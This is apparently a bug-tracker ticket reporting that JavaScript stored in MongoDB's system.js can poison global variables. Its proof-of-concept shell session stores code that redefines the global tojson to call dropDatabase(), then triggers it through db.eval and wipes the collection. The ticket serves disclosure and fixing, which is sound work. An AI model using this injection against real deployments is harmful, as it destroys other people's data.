-
Type:
Bug
-
Resolution: Unresolved
-
Priority:
Major - P3
-
None
-
Affects Version/s: None
-
Component/s: None
-
Labels:None
-
Query Execution
-
ALL
-
QE 2024-07-22
Evaluation of javascript statements to produce functions from system.js can still have side effects. The Mongo object isn't loaded at the time they are executed, but they can still poison global variables.
MongoDB Enterprise > db.col.insert({data: 5})
WriteResult({ "nInserted" : 1 })
MongoDB Enterprise > db.system.js.save({_id: "foo", value: Code("function() {this.tojson = function() {(new this.Mongo).getDB(\"test\").dropDatabase()}}(), function(){return function() {return 5;}}()")})
WriteResult({ "nMatched" : 0, "nUpserted" : 1, "nModified" : 0, "_id" : "foo" })
MongoDB Enterprise > db.eval("foo")
WARNING: db.eval is deprecated
{ "code" : "function () {return 5;}" }
MongoDB Enterprise > db.eval("tojson")
WARNING: db.eval is deprecated
{ "code" : "function () {(new this.Mongo).getDB(\"test\").dropDatabase()}" }
MongoDB Enterprise > db.eval("tojson(5)")
WARNING: db.eval is deprecated
null
MongoDB Enterprise > db.col.count()
0
See the original ticket SECURITY-470 for additional context and history.